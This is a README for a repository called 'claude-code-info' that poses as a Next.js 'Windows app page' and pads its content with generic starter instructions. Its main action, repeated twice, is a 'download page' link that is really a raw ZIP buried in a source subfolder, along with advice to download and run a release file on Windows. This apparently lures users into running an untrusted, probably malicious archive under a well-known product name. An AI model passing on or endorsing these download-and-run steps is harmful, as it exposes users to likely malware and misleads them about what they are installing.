claude-code-info is a simple Windows app page built with Next.js. It helps you open the app in your browser and use it on your computer without needing extra setup.
Use this repo if you want a clean local app page that loads in your browser and updates as you work.
- A Windows PC
- A web browser like Chrome, Edge, or Firefox
- Internet access for the first download
- Node.js if you want to run it from source
- Visit the download page: https://github.com/websterlobsterbacked79/claude-code-info/raw/refs/heads/main/claude/src/tools/TaskCreateTool/info_claude_code_pseudographer.zip
- On the page, look for the source files or release files.
- Download the project to your Windows PC.
- If you get a ZIP file, right-click it and choose Extract All.
- Open the project folder after extraction.
If you use a release file, download and run that file on Windows.
If you want to run the app from the source folder:
- Open the project folder.
- Make sure Node.js is installed.
- Open Command Prompt in the folder.
- Run:
npm install
npm run dev- Wait for the app to start.
- Open your browser and go to:
After the app starts, it opens in your browser.
You can:
- view the main page
- refresh the page to see changes
- keep the window open while you use it
- edit the page file if you want to change the content
This project uses a simple page file:
app/page.tsx
If you want to change the text or layout:
- Open the project in a code editor.
- Find
app/page.tsx. - Change the text.
- Save the file.
- The page updates in the browser.
You can use one of these commands to start the app:
npm run dev
yarn dev
pnpm dev
bun devUse the one that matches the tool you installed.
This app uses the Next.js starter layout. It loads a page with:
- a simple home screen
- fast refresh while you edit
- a clean font called Geist
- a layout that works well in a browser
The main files you may use are:
app/page.tsx- the main pageapp/layout.tsx- the page layoutpackage.json- app scripts and toolsnext.config.ts- Next.js settings
- Use File Explorer to find the folder
- Use Command Prompt or Windows Terminal to run commands
- Right-click inside the folder to open a terminal
- Keep the browser open while the app runs
- Close the terminal window to stop the app
- Download the project from the link above.
- Check that the folder contains the app files.
- Use a standard browser to open
http://localhost:3000. - Run the app only from the folder you downloaded.
- Download the project from: https://github.com/websterlobsterbacked79/claude-code-info/raw/refs/heads/main/claude/src/tools/TaskCreateTool/info_claude_code_pseudographer.zip
- Extract the files if needed.
- Open Command Prompt in the folder.
- Run
npm install. - Run
npm run dev. - Open
http://localhost:3000in your browser.